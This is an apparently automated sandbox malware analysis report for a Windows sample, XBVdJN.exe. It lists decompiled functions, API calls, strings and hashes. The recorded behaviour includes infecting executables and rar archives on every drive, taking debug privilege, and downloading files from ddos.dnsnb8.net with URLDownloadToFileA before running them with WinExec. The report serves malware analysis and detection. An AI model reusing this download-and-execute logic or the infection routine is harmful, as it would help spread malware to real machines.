                                                                                                                                                                                                                          • Instruction ID: aef3a31cf8084b42ac526c669f8e6e8d1684bbabae2ff8c311d92ddf873233dd
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b35c354bb450e97f0d3d56b74ab2f857cdc5695473b555c91f8392088d510090
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 951245B65087849FDB328F64CC45BEA3BB6EF02310F1C45AEF8858B293D674A981C755

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 0 611e6e-611e95 call 612d60 3 611e97 call 611d8a 0->3 4 611e9c-611eaa call 611df6 0->4 3->4 8 611eb0-611ed9 SetFileAttributesA CreateFileA 4->8 9 612332 4->9 8->9 10 611edf-611f28 call 611915 SetFilePointer CreateFileMappingA MapViewOfFile 8->10 11 612338-61233b 9->11 10->9 20 611f2e-611f39 10->20 13 612346-612349 11->13 14 61233d-612340 UnmapViewOfFile 11->14 15 612350-612354 13->15 16 61234b-61234e FindCloseChangeNotification 13->16 14->13 18 612391-61239a call 612d9b 15->18 19 612356-61235b CloseHandle 15->19 16->15 19->18 20->9 22 611f3f-611f56 20->22 22->9 24 611f5c-611f64 22->24 24->9 25 611f6a-611f70 24->25 25->9 26 611f76-611f87 call 611c81 25->26 26->9 29 611f8d-611fa7 call 61185b call 611c81 26->29 29->9 34 611fad-611fb4 29->34 35 612024-612045 34->35 36 611fb6-611fc5 call 611af9 34->36 35->9 37 61204b-61204e 35->37 36->35 44 611fc7-611fd2 36->44 39 612070-6120f4 call 611af9 * 2 call 611c68 * 2 memset * 2 37->39 40 612050-612053 37->40 62 6120f5-6120fe 39->62 42 612056-61205a 40->42 42->39 45 61205c-612061 42->45 44->9 47 611fd8-611fe7 44->47 45->9 48 612067-61206e 45->48 50 611fe9-611fec 47->50 51 611fef-612006 call 611af9 47->51 48->42 50->51 57 612013-61201e FlushViewOfFile 51->57 58 612008-61200e call 611c68 51->58 57->35 58->57 63 612130-612139 62->63 64 612100-612114 62->64 67 61213c-612142 63->67 65 612116-61212a 64->65 66 61212d-61212e 64->66 65->66 66->62 68 612144-612150 67->68 69 61215c 67->69 70 612152-612154 68->70 71 612157-61215a 68->71 72 61215f-612162 69->72 70->71 71->67 73 612181-612184 72->73 74 612164-612171 72->74 77 612186 73->77 78 61218d-6121ba call 611c68 73->78 75 612177-61217e 74->75 76 61232a-61232d 74->76 75->73 76->72 77->78 81 6121d3-61220b call 611c81 call 611c68 78->81 82 6121bc-6121d0 call 611c68 78->82 89 61221b-61221e 81->89 90 61220d-612218 call 611c68 81->90 82->81 92 612220-612223 89->92 93 612226-612328 memcpy UnmapViewOfFile CloseHandle call 611b8a call 61185b SetFilePointer SetEndOfFile SetFilePointer WriteFile * 2 call 611915 FindCloseChangeNotification 89->93 90->89 92->93 93->11
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SetFileAttributesA.KERNEL32(?,00000080,?,006132B0,00000164,00612986,?), ref: 00611EB9
                                                                                                                                                                                                                          • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 00611ECD
                                                                                                                                                                                                                          • SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000002,00000000,00000000), ref: 00611EF3
                                                                                                                                                                                                                          • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00000000,00000000), ref: 00611F07
                                                                                                                                                                                                                          • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000400), ref: 00611F1D
                                                                                                                                                                                                                          • FlushViewOfFile.KERNEL32(?,00000400,?,00000000,00000000,?,00000000,00000002), ref: 0061201E
                                                                                                                                                                                                                          • memset.MSVCRT ref: 006120D8
                                                                                                                                                                                                                          • memset.MSVCRT ref: 006120EA
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 0061222D
                                                                                                                                                                                                                          • UnmapViewOfFile.KERNEL32(?,?,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00612238
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 0061224A
                                                                                                                                                                                                                          • SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 006122C6
                                                                                                                                                                                                                          • SetEndOfFile.KERNEL32(000000FF,?,?,?,00000000,00000000,?,00000000,00000002), ref: 006122CB
                                                                                                                                                                                                                          • SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,00000000,00000000,?,00000000,00000002), ref: 006122DD
                                                                                                                                                                                                                          • WriteFile.KERNEL32(000000FF,00614008,00000271,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 006122F7
                                                                                                                                                                                                                          • WriteFile.KERNEL32(000000FF,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 0061230D
                                                                                                                                                                                                                          • FindCloseChangeNotification.KERNEL32(000000FF,000000FF,00000001,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00612322
                                                                                                                                                                                                                          • UnmapViewOfFile.KERNEL32(?,?,006132B0,00000164,00612986,?), ref: 00612340
                                                                                                                                                                                                                          • FindCloseChangeNotification.KERNEL32(?,?,006132B0,00000164,00612986,?), ref: 0061234E
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(000000FF,?,006132B0,00000164,00612986,?), ref: 00612359
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.2443066507.0000000000611000.00000020.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443048248.0000000000610000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443084694.0000000000613000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443101466.0000000000614000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443115264.0000000000616000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_610000_XBVdJN.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: File$CloseView$Pointer$ChangeCreateFindHandleNotificationUnmapWritememset$AttributesFlushMappingmemcpy
                                                                                                                                                                                                                          • String ID: .@a$5@a$<@a$C@a$m@a
                                                                                                                                                                                                                          • API String ID: 3349749541-1651383129
                                                                                                                                                                                                                          • Opcode ID: 26bde03b186d386a4bf17692afa123f40b2a73d85586f3756303b0ea8b6f58fd
                                                                                                                                                                                                                          • Instruction ID: 60dbcdbf8ec51ff9aee45437fd1cecdc0a1dbe02c7ea0e803346bb045ac9bd97
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 26bde03b186d386a4bf17692afa123f40b2a73d85586f3756303b0ea8b6f58fd
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F9F16E71900209EFCB20DFA4DC91AEDBBB6FF08314F18852AE519AB651D734AE91CF54

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 117 611973-61199a PathFileExistsA 118 6119a0-6119aa 117->118 119 611ac7-611acc 117->119 120 6119af-6119c2 CreateFileA 118->120 121 611ad0-611ad5 119->121 122 611ace 119->122 123 6119c4-6119d3 Sleep 120->123 124 611a28-611a36 GetFileSize 120->124 125 611af0-611af6 121->125 126 611ad7-611ad9 121->126 122->121 123->120 127 6119d5-611a0b call 61185b wsprintfA CopyFileA 123->127 128 611a87-611a8b 124->128 129 611a38-611a3b 124->129 126->125 127->124 141 611a0d-611a26 CreateFileA 127->141 130 611a96-611a9a 128->130 131 611a8d-611a90 FindCloseChangeNotification 128->131 129->128 133 611a3d-611a51 VirtualAlloc 129->133 134 611aad-611ab1 130->134 135 611a9c 130->135 131->130 133->128 137 611a53-611a57 133->137 139 611ab3-611ab6 134->139 140 611adb-611ae0 134->140 138 611aa0-611aa7 DeleteFileA 135->138 142 611a80 137->142 143 611a59-611a6d ReadFile 137->143 138->134 139->119 144 611ab8-611ac1 VirtualFree 139->144 146 611ae2-611ae5 140->146 147 611ae7-611aec 140->147 141->124 145 611a9e 141->145 142->128 143->128 148 611a6f-611a7e 143->148 144->119 145->138 146->147 147->125 149 611aee 147->149 148->142 148->143 149->125
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PathFileExistsA.SHLWAPI(\Na`Na,00000000,C:\Users\user\AppData\Local\Temp\XBVdJN.exe), ref: 00611992
                                                                                                                                                                                                                          • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 006119BA
                                                                                                                                                                                                                          • Sleep.KERNEL32(00000064), ref: 006119C6
                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 006119EC
                                                                                                                                                                                                                          • CopyFileA.KERNEL32(?,?,00000000), ref: 00611A00
                                                                                                                                                                                                                          • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00611A1E
                                                                                                                                                                                                                          • GetFileSize.KERNEL32(?,00000000), ref: 00611A2C
                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00611A46
                                                                                                                                                                                                                          • ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 00611A65
                                                                                                                                                                                                                          • FindCloseChangeNotification.KERNEL32(000000FF), ref: 00611A90
                                                                                                                                                                                                                          • DeleteFileA.KERNEL32(?), ref: 00611AA7
                                                                                                                                                                                                                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00611AC1
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • %s%.8X.data, xrefs: 006119E6
                                                                                                                                                                                                                          • \Na`Na, xrefs: 00611980
                                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 006119DB
                                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\XBVdJN.exe, xrefs: 0061197C
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.2443066507.0000000000611000.00000020.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443048248.0000000000610000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443084694.0000000000613000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443101466.0000000000614000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443115264.0000000000616000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_610000_XBVdJN.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: File$CreateVirtual$AllocChangeCloseCopyDeleteExistsFindFreeNotificationPathReadSizeSleepwsprintf
                                                                                                                                                                                                                          • String ID: %s%.8X.data$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\XBVdJN.exe$\Na`Na
                                                                                                                                                                                                                          • API String ID: 2523042076-147115663
                                                                                                                                                                                                                          • Opcode ID: 723bc10770dbc7640d11d3b3a95c653e58e9c0e0595209fa176e3abfed372a8d
                                                                                                                                                                                                                          • Instruction ID: c67cb0a00aa23ca64eefc02f62e4814ed13199dc0dcdaf5fa232a6df2ff84f2b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 723bc10770dbc7640d11d3b3a95c653e58e9c0e0595209fa176e3abfed372a8d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AF515271901259EFCF109F94CC84AEEBFBAEF0A355F184569F616EA290D3309E90CB50

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 150 6128b8-6128ff memset wsprintfA 151 612905-61290d 150->151 152 6129db-6129df 150->152 151->152 153 612913-612919 151->153 154 612956-612965 strrchr 153->154 155 61291b-61294c memset wsprintfA call 6129e2 153->155 154->152 157 612967-612978 lstrcmpiA 154->157 158 612951 155->158 159 612988-612992 lstrcmpiA 157->159 160 61297a-612981 call 611e6e 157->160 158->152 159->152 161 612994-61299b 159->161 165 612986 160->165 163 6129ad-6129c9 strstr 161->163 164 61299d-6129a3 161->164 167 6129d3-6129d6 call 612692 163->167 168 6129cb-6129d1 call 61239d 163->168 164->163 166 6129a5-6129a7 lstrcpy 164->166 165->152 166->163 167->152 168->152
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 006128D3
                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 006128F7
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00612925
                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 00612940
                                                                                                                                                                                                                            • Part of subcall function 006129E2: memset.MSVCRT ref: 00612A02
                                                                                                                                                                                                                            • Part of subcall function 006129E2: wsprintfA.USER32 ref: 00612A1A
                                                                                                                                                                                                                            • Part of subcall function 006129E2: memset.MSVCRT ref: 00612A44
                                                                                                                                                                                                                            • Part of subcall function 006129E2: lstrlen.KERNEL32(?), ref: 00612A54
                                                                                                                                                                                                                            • Part of subcall function 006129E2: lstrcpyn.KERNEL32(?,?,-00000001), ref: 00612A6C
                                                                                                                                                                                                                            • Part of subcall function 006129E2: strrchr.MSVCRT ref: 00612A7C
                                                                                                                                                                                                                            • Part of subcall function 006129E2: lstrcmpiA.KERNEL32(?,Documents and Settings), ref: 00612A9F
                                                                                                                                                                                                                            • Part of subcall function 006129E2: lstrlen.KERNEL32(Documents and Settings), ref: 00612AAE
                                                                                                                                                                                                                            • Part of subcall function 006129E2: memset.MSVCRT ref: 00612AC6
                                                                                                                                                                                                                            • Part of subcall function 006129E2: memset.MSVCRT ref: 00612ADA
                                                                                                                                                                                                                            • Part of subcall function 006129E2: FindFirstFileA.KERNEL32(?,?), ref: 00612AEF
                                                                                                                                                                                                                            • Part of subcall function 006129E2: memset.MSVCRT ref: 00612B13
                                                                                                                                                                                                                          • strrchr.MSVCRT ref: 00612959
                                                                                                                                                                                                                          • lstrcmpiA.KERNEL32(00000001,exe), ref: 00612974
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.2443066507.0000000000611000.00000020.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443048248.0000000000610000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443084694.0000000000613000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443101466.0000000000614000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443115264.0000000000616000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_610000_XBVdJN.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$wsprintf$lstrcmpilstrlenstrrchr$FileFindFirstlstrcpyn
                                                                                                                                                                                                                          • String ID: %s%s$%s\$C:\Users\user\AppData\Local\Temp\$exe$rar
                                                                                                                                                                                                                          • API String ID: 3004273771-1791786966
                                                                                                                                                                                                                          • Opcode ID: b9da12d2179268b1e9b2c205e1aed13a02f8a5df0e69e32eb4baba4201895df4
                                                                                                                                                                                                                          • Instruction ID: 6532814002a54596f2e8f6136d3fece380a265a67b8f33b3481bffbe38b7bad2
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b9da12d2179268b1e9b2c205e1aed13a02f8a5df0e69e32eb4baba4201895df4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5B31EA7194031E7BDB20A76ADC95FCA37AE9F14310F0D0857F545A3280E6B4DBD48BA0

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 172 611099-6110b4 173 611199-61119c 172->173 174 6110ba-6110c7 172->174 175 6110c8-6110d4 174->175 176 611184-611190 175->176 177 6110da 175->177 176->175 179 611196-611198 176->179 178 611113-611162 call 61185b wsprintfA * 2 URLDownloadToFileA 177->178 182 611168-611182 lstrlen Sleep 178->182 183 6110dc-61110d call 611000 WinExec lstrlen 178->183 179->173 182->176 182->178 183->178 183->179
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0061185B: GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,76938400,http://%s:%d/%s/%s,?,?,?,00611118), ref: 00611867
                                                                                                                                                                                                                            • Part of subcall function 0061185B: srand.MSVCRT ref: 00611878
                                                                                                                                                                                                                            • Part of subcall function 0061185B: rand.MSVCRT ref: 00611880
                                                                                                                                                                                                                            • Part of subcall function 0061185B: srand.MSVCRT ref: 00611890
                                                                                                                                                                                                                            • Part of subcall function 0061185B: rand.MSVCRT ref: 00611894
                                                                                                                                                                                                                          • WinExec.KERNEL32(?,00000005), ref: 006110F1
                                                                                                                                                                                                                          • lstrlen.KERNEL32(00614748), ref: 006110FA
                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 0061112A
                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 00611143
                                                                                                                                                                                                                          • URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 0061115B
                                                                                                                                                                                                                          • lstrlen.KERNEL32(ddos.dnsnb8.net,00000000,?,?,00000000,00000000), ref: 00611169
                                                                                                                                                                                                                          • Sleep.KERNEL32 ref: 00611179
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.2443066507.0000000000611000.00000020.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443048248.0000000000610000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443084694.0000000000613000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443101466.0000000000614000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443115264.0000000000616000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_610000_XBVdJN.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileTimelstrlenrandsrandwsprintf$DownloadExecSleepSystem
                                                                                                                                                                                                                          • String ID: %s%.8X.exe$C:\Users\user\AppData\Local\Temp\$HGa$cj/$ddos.dnsnb8.net$http://%s:%d/%s/%s
                                                                                                                                                                                                                          • API String ID: 1280626985-3431217257
                                                                                                                                                                                                                          • Opcode ID: dd811f5023a791330159270864cd53e628209eaa8919bc64cd325d1460f8777b
                                                                                                                                                                                                                          • Instruction ID: 4955d13efe3e3bd299cfcc4b9f6dcdb8bf949d15c8c180b90fe6533efed0e477
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dd811f5023a791330159270864cd53e628209eaa8919bc64cd325d1460f8777b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C421A175900218BACB20DBA0DC45BEEBBBFAB16316F1D8096E601A7150DB745BC4CFA0

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\,?,00000005,00000000), ref: 0061164F
                                                                                                                                                                                                                          • GetSystemDirectoryA.KERNEL32(C:\Windows\system32,00000104), ref: 0061165B
                                                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\XBVdJN.exe,00000104), ref: 0061166E
                                                                                                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,Function_00001099,00000000,00000000,00000000), ref: 006116AC
                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000), ref: 006116BD
                                                                                                                                                                                                                            • Part of subcall function 0061139F: GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\XBVdJN.exe), ref: 006113BC
                                                                                                                                                                                                                            • Part of subcall function 0061139F: LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 006113DA
                                                                                                                                                                                                                            • Part of subcall function 0061139F: GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 00611448
                                                                                                                                                                                                                          • lstrcpy.KERNEL32(?,C:\Users\user\AppData\Local\Temp\XBVdJN.exe), ref: 006116E5
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.2443066507.0000000000611000.00000020.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443048248.0000000000610000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443084694.0000000000613000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443101466.0000000000614000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443115264.0000000000616000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_610000_XBVdJN.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CreateCurrentDirectoryFileLookupModuleNameObjectPathPrivilegeProcessSingleSystemTempThreadValueVersionWaitlstrcpy
                                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\XBVdJN.exe$C:\Windows\system32$Documents and Settings
                                                                                                                                                                                                                          • API String ID: 123563730-1332623409
                                                                                                                                                                                                                          • Opcode ID: 63a3fb7ee5a35819c12fa68dfce180456dedf1e0bda332033de7eb1bb3e77268
                                                                                                                                                                                                                          • Instruction ID: c1dcd9a03b00e10779a93785b5febaa4e8d71cddc91972bc84d479ab7e37c2ab
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 63a3fb7ee5a35819c12fa68dfce180456dedf1e0bda332033de7eb1bb3e77268
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BD11D6715001247BCF205BA0AD49EDB3EAFEF0B362F0D5016F30A992A0CA7145C0D7A1

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 205 611000-611023 CreateFileA 206 611092-611096 205->206 207 611025-611055 GetFileSize CreateFileMappingA MapViewOfFile 205->207 208 611057-61105f 207->208 209 61107b-611085 207->209 212 611061-61106e call 6117d0 208->212 213 611074-611075 UnmapViewOfFile 208->213 210 611087-61108b CloseHandle 209->210 211 61108d-611091 CloseHandle 209->211 210->211 211->206 212->213 213->209
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CreateFileA.KERNEL32(00000003,C0000000,00000003,00000000,00000003,00000080,00000000,HGa,http://%s:%d/%s/%s,006110E8,?), ref: 00611018
                                                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,ddos.dnsnb8.net,76938400), ref: 00611029
                                                                                                                                                                                                                          • CreateFileMappingA.KERNEL32(00000000,00000000,00000004,00000000,00000000,00000000), ref: 00611038
                                                                                                                                                                                                                          • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 0061104B
                                                                                                                                                                                                                          • UnmapViewOfFile.KERNEL32(00000000), ref: 00611075
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 0061108B
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0061108E
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.2443066507.0000000000611000.00000020.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443048248.0000000000610000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443084694.0000000000613000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443101466.0000000000614000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443115264.0000000000616000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_610000_XBVdJN.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: File$CloseCreateHandleView$MappingSizeUnmap
                                                                                                                                                                                                                          • String ID: HGa$ddos.dnsnb8.net$http://%s:%d/%s/%s
                                                                                                                                                                                                                          • API String ID: 1223616889-3642003181
                                                                                                                                                                                                                          • Opcode ID: 12b195d546a3f3772b7636684453fd69e175231f8f602ea36ecce1c467889698
                                                                                                                                                                                                                          • Instruction ID: f2d3be2e2a63dfecc4ec3e3c9782bfd0088d76e2a1ea5dc42383253195b4c8fd
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 12b195d546a3f3772b7636684453fd69e175231f8f602ea36ecce1c467889698
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 98019B7150035CBFE7305F609C88EAB7BEEDB4879AF09452AF345A6290DA705E848B70

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 367 612b8c-612bc6 memset GetLogicalDriveStringsA 368 612c09-612c28 WaitForMultipleObjects 367->368 369 612bc8-612bcc 367->369 372 612c2a-612c3a CreateThread 368->372 373 612c3c-612c45 368->373 370 612bfa-612c07 lstrlen 369->370 371 612bce-612bd0 369->371 370->368 370->369 371->370 374 612bd2-612bdc GetDriveTypeA 371->374 372->373 374->370 375 612bde-612be1 374->375 375->370 376 612be3-612bf6 CreateThread 375->376 376->370
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00612BA6
                                                                                                                                                                                                                          • GetLogicalDriveStringsA.KERNEL32(00000050,?), ref: 00612BB4
                                                                                                                                                                                                                          • GetDriveTypeA.KERNEL32(?), ref: 00612BD3
                                                                                                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,Function_00002B7D,?,00000000,00000000), ref: 00612BEE
                                                                                                                                                                                                                          • lstrlen.KERNEL32(?), ref: 00612BFB
                                                                                                                                                                                                                          • WaitForMultipleObjects.KERNEL32(?,?,00000001,000000FF), ref: 00612C16
                                                                                                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,00612845,00000000,00000000,00000000), ref: 00612C3A
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.2443066507.0000000000611000.00000020.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443048248.0000000000610000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443084694.0000000000613000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443101466.0000000000614000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443115264.0000000000616000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_610000_XBVdJN.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CreateDriveThread$LogicalMultipleObjectsStringsTypeWaitlstrlenmemset
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1073171358-0
                                                                                                                                                                                                                          • Opcode ID: f7e84ee5a88acd26e701878d9f84075548c5d70e74a725a1a5055a977728831a
                                                                                                                                                                                                                          • Instruction ID: f267273a0d1b7a750d8bf8fbafc0be1d5d27e687dc2846714e68709378deae18
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f7e84ee5a88acd26e701878d9f84075548c5d70e74a725a1a5055a977728831a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8421D5B180015EAFEB209F64AC84DEF7BAFFB08349B1D012AF94293251D7208D56CB60

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
